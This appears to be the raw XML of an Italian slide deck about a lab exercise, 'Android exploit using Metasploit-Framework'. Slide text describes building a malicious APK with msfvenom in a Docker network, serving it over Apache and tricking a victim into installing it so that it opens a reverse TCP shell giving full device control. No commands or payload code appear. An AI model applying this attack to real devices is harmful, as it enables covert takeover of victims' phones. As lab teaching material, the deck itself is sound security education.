        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:13:09.380" v="2384" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3917286675" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:13:09.380" v="2384" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3917286675" sldId="263"/>
            <ac:spMk id="2" creationId="{88E9F764-6F37-4D91-BEF0-F3AFB97C3329}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:10:39.352" v="2337" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3917286675" sldId="263"/>
            <ac:spMk id="3" creationId="{86B8A753-F286-4414-BAD9-7E00C3B076D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:12:51.535" v="2374" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3917286675" sldId="263"/>
            <ac:picMk id="5" creationId="{6594980E-2EEB-48D6-B6CB-E487DD1BF6D4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:12:53.087" v="2375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3917286675" sldId="263"/>
            <ac:picMk id="7" creationId="{4D381776-9457-419B-B463-1C779F47698A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="82024403" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:17:58.392" v="2410" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:spMk id="2" creationId="{288C47FC-57AE-4355-BE24-5E0592202F75}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:17:57.465" v="2409" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:spMk id="3" creationId="{A5B5AFA0-07F5-4656-B871-66BBD6BDBA5C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:spMk id="14" creationId="{56827C3C-D52F-46CE-A441-3CD6A1A6A0A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:spMk id="16" creationId="{F52A8B51-0A89-497B-B882-6658E029A3F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:spMk id="18" creationId="{EB1CEFBF-6F09-4052-862B-E219DA15757E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:spMk id="20" creationId="{BCB5D417-2A71-445D-B4C7-9E814D633D33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:picMk id="5" creationId="{F5DD81BE-FA81-4B1E-AE4F-5B971CC7C5E3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:picMk id="7" creationId="{6D82DCC0-44B5-45DE-BAFB-70B3A0E68B42}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:59.011" v="2496" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="82024403" sldId="264"/>
            <ac:picMk id="9" creationId="{730057E0-5E9C-4146-A882-DFB232E9C542}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod setBg">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2174277938" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:spMk id="15" creationId="{56827C3C-D52F-46CE-A441-3CD6A1A6A0A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:spMk id="17" creationId="{F52A8B51-0A89-497B-B882-6658E029A3F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:spMk id="19" creationId="{EB1CEFBF-6F09-4052-862B-E219DA15757E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:spMk id="21" creationId="{BCB5D417-2A71-445D-B4C7-9E814D633D33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:picMk id="3" creationId="{B08408E3-B110-48F2-9FFE-4B14B7AA39B2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:19:34.817" v="2429" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:picMk id="5" creationId="{F5DD81BE-FA81-4B1E-AE4F-5B971CC7C5E3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:picMk id="6" creationId="{7BC79796-E9E2-4FDE-97C5-B25497239047}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:19:35.368" v="2430" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:picMk id="7" creationId="{6D82DCC0-44B5-45DE-BAFB-70B3A0E68B42}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:19:35.858" v="2431" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:picMk id="9" creationId="{730057E0-5E9C-4146-A882-DFB232E9C542}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:54.370" v="2495" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2174277938" sldId="265"/>
            <ac:picMk id="10" creationId="{A3659F7D-C103-4C35-BBA8-15E1220689E3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod setBg">
        <pc:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:28:23.407" v="2503" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2063276999" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:22:42.264" v="2442" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:spMk id="2" creationId="{E0300BCE-196A-4A3D-B080-D0C7E79AE863}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:22:39.241" v="2441" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:spMk id="3" creationId="{8FD23DB5-D05A-4BFE-BE91-E1587D4B3361}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:49.783" v="2494" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:spMk id="12" creationId="{A9F529C3-C941-49FD-8C67-82F134F64BDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:49.783" v="2494" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:spMk id="14" creationId="{20586029-32A0-47E5-9AEC-AE3ABA6B94D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:28:22.214" v="2502" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:picMk id="5" creationId="{F6855833-CB28-42CC-BB16-CF78EC7D4C9D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:28:23.407" v="2503" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:picMk id="7" creationId="{ABE23845-009A-43CD-8FBE-72FD2EA35204}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="LUCA CONTE" userId="15e9a1c0-2ead-405b-a778-4c6b8edb10f3" providerId="ADAL" clId="{41198CF6-3A98-4044-98DB-5B72C9D0B64A}" dt="2022-01-31T19:27:49.783" v="2494" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2063276999" sldId="266"/>
            <ac:cxnSpMk id="16" creationId="{8C730EAB-A532-4295-A302-FB4B90DB9F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88D6-5EFC-466A-981B-647B110A0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537BF-FB1D-47E4-84F2-9E3A71BD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ACD5-412A-492B-A147-F64F1428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E489-CCF2-4E33-A558-46E2F9B8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9125-CDDF-44FC-9FC8-6FB0E2B5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1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1CE7-07CC-4D66-B894-1261ACA5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2B8F0-DCF0-4F5D-AFCC-2A4DC45C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84DE-C6BA-4C56-B0DD-C0D23CA6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0FB5-22B7-4CC9-AABB-F3ACCB9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209B-106A-43E9-BD4D-A1EF813E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4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A0772-CC31-4397-ADDA-645906F4E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4C14A-5738-4DA5-B883-BB4991CE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32A6-94F0-49C4-A114-3006B41A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B5EA-9FBF-4D5B-AA72-924C9164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E2B5-6D3F-401F-9B11-BCCD4474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7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C423-9716-403A-B89A-C822FF74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6299-3EE4-4B3C-A359-0F12BF3C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35F6-3F40-4407-948C-18F2119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39AA-CB33-45FD-B826-DD905377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9728-E215-4B4E-A5BB-0D517C0B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8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7913-EA7F-41BB-8376-EBD1B32C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635A7-FD82-4AC3-9556-0224F5BC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6E29-8421-4279-8663-3CDCBBAF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B9C5-A28E-4F78-B07A-DA62612D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7F78-00AD-46EC-851C-35E2ECBC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4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0AE4-8F4A-47F2-A99D-8D48B543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AB10-77A4-4066-A198-0824A775B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59C0-04F1-48DC-84CC-5B564D9C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4BF2-43BE-4F1F-9B29-E62C23C6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E2149-67B4-43A9-AF06-DC234673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C8D9-AB9A-44D1-B2F4-B28A0BCD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8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F44F-74BF-4E98-AE2D-A58C5EDC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620AE-4A8A-472F-9877-D98860E1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CDA34-C930-451D-9ADA-25E43924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34210-BF65-4648-B33A-6483AEC93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FDB86-EF46-4B98-8BF1-F860E3856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3DC95-CA36-4FE8-B564-E9C82D8F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BB66C-8CCE-4296-A8B8-543C4D90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61124-E38A-43FC-A684-28F8C14E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5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1A6-5FAB-4522-B9D7-43D1875F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6A0E4-EF37-44CD-8E91-CF488A2F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BC75-72C5-4724-B602-60B69FE0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37342-4E46-41F0-BC3D-32DEA15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8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B945D-E44D-461F-BC06-64A33B36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44863-5916-4BB3-BBC7-F5A71D6D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E2DAF-58C7-4C0F-8112-6528FFE1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2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F0A7-032F-49A7-A44B-69A5411E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EF2A-3FE5-4782-8383-53268E47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493F6-0427-472B-9DBE-4C16D9AA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FD30-F497-4923-9376-18410D7E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A9101-8BEF-4DDE-90E8-534BB881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570E-0430-422B-8573-04545EF2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85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2ED-2CFC-4727-B907-DFE7BF46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ED23B-FFB6-47B5-A938-89F45F754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E1524-B2C4-4513-8638-CDAE5EBC9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05777-9834-4696-95B5-00DEE9AE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A07D0-5A96-429B-B6F5-3AAF73C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4A49-D2B4-40B3-8476-CB14DE39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1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EA654-5BE6-4AE1-B2F4-FABEC6F1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C6AB5-2B7E-4353-B598-4F3847F6E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37AF-B91B-417E-8B2A-FC53FEFE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02AC-F253-4C14-A5FA-1816B695239C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61B1-49DF-4B9A-86B0-4F4E28D0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929E-1232-4559-A1FE-9EF7DC59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FFAE-2563-4F2D-B6D2-6F6ED195BA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4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7C26-DAB3-4389-BA6A-F024CA90D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597"/>
            <a:ext cx="9144000" cy="888520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>ANDROID EXPLOIT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FB7CC-4D68-4DA2-B016-2129AAB3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5117"/>
            <a:ext cx="9144000" cy="3316857"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>USING METASPLOIT-FRAMEWORK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223224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23845-009A-43CD-8FBE-72FD2EA3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55" y="643467"/>
            <a:ext cx="2827316" cy="5571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55833-CB28-42CC-BB16-CF78EC7D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16" y="643467"/>
            <a:ext cx="27994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7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4537-2B65-4138-845E-BF6AA7CD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Objective and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D2F83-5C81-4046-93A7-CE857FC9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848" y="3333358"/>
            <a:ext cx="1470158" cy="1583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882D1-0718-4C49-ADC7-7D5BAAF2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432" y="3429000"/>
            <a:ext cx="1936362" cy="139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6314AA-D2AA-4F66-97BC-808C4357D7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7203056" y="2679849"/>
            <a:ext cx="4726141" cy="3163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Content Placeholder 4" descr="Cloud with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{919995FA-6835-46F3-A03E-6B697A72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4927" y="2159913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69F082-F9CF-45A0-9386-636F45DF00C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7970246" y="2663189"/>
            <a:ext cx="27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172.16.238.0/24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652CA-4C75-4011-9B50-18092F6313A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10231620" y="491711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172.16.238.11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2B1D8-666D-41CC-8A66-09DA04286B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7605622" y="47535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172.16.238.10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BE8ED-0CF2-4F40-A18A-D3452D811086}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189869" y="1690688"/>
            <a:ext cx="68435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vuole simulare uno scenario di attacco rivolto ai dispositivi android di nuova e vecchia generazione (Dalvik e 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L’attacco è stato simulato utilizzando un dispositivo android samsung galaxy s6 messo in esercizio in un ambiente virtualizzato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versione android utilizzata è la versione 8.1.0 (patch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L’attacco non sfrutta una vera e propria vulnerabilità dei sistemi android ma fa leva sull’inconsapevolezza della vittima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sferrare l’attacco, l’attaccante deve munirsi di una macchina kali-linux con il tool metasploit e di un server web (in questo caso sarà utilizzato apache2)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L’attaccante genererà un file .apk e forzerà la vittima a installare l’applicazione malevola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All’atto dell’installazione del malware sul dispositivo android verrà creata una connessione verso l’hacker (reverse tcp shell) dove otterrà pieno controllo del dispositivo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stato utilizzato l’ambiente docker per la creazione della rete, dove risiedono due entità: un android device e una macchina kali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C4A31-254D-41F2-8B33-4152C3F6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495" y="1014659"/>
            <a:ext cx="1821262" cy="16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9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825B-0E87-4275-AF20-E2149F39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940" y="365125"/>
            <a:ext cx="2802859" cy="706293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Deploy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93C30-8F4B-4A3B-A960-8A486219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854" y="3115448"/>
            <a:ext cx="3473231" cy="1035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BE867-8F52-4B28-8D51-595C3CE9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5" y="696490"/>
            <a:ext cx="3325194" cy="546502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625831A7-D422-4E56-A285-138088CC7600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3594576" y="1483635"/>
            <a:ext cx="559248" cy="15379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152C33B-7EA1-4B33-9FAF-FC5BBDFB940F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3594576" y="3829738"/>
            <a:ext cx="651858" cy="1035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D5E48D2-4350-45CB-BAD2-B2076C556EB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8028696" y="3195145"/>
            <a:ext cx="436514" cy="813777"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 488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D66C6-B36A-42BE-AA4E-FEC16CFFE581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5853449" y="2894599"/>
            <a:ext cx="293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Crezione di un container kali-linux contenente apache server e metasploit framework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CF46D-0906-45C0-8FED-EC5D83CAFF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4203564" y="1659787"/>
            <a:ext cx="2190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Setup del container con sistema operativo android e inserimento nella rete mynet.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68447-0207-4F0B-9A19-95160DA9FFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4403257" y="4008922"/>
            <a:ext cx="1990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Setup della macchina kali e inserimento nella rete mynet.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079C792-67DA-497C-87C2-583A4B28E079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3594576" y="5066465"/>
            <a:ext cx="651858" cy="1035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1E1D5-28B6-4E6B-8F83-35AD5D51D1A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4306938" y="5492577"/>
            <a:ext cx="191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Creazione subnet mynet 172.16.238.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45067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559141-BF46-403B-B183-22EAC4AA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" y="2015081"/>
            <a:ext cx="6657537" cy="1413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912FD-39B8-4455-8C46-6D557EC1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18" y="1564389"/>
            <a:ext cx="4492440" cy="4839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8847E-15F0-4342-BA60-9ECC91CFD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0" y="3851884"/>
            <a:ext cx="6968046" cy="7308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D304BF3-9847-410F-9E9B-814F7A37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0" y="420544"/>
            <a:ext cx="3350443" cy="706293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Start compose</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="322985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D304BF3-9847-410F-9E9B-814F7A37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69" y="81018"/>
            <a:ext cx="8209293" cy="706293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Create malware payload - msfvenom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D85443-11A1-475D-9611-3D209CF1AA77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496518" y="892368"/>
            <a:ext cx="361211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Check if apache is running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38610-2EF0-46BB-BE04-C28BD1BC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42" y="892368"/>
            <a:ext cx="2201639" cy="5672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B67C3D-A4FD-4A0D-8D87-D3CDF1EEA402}"/>
              </a:ext>
            </a:extLst>
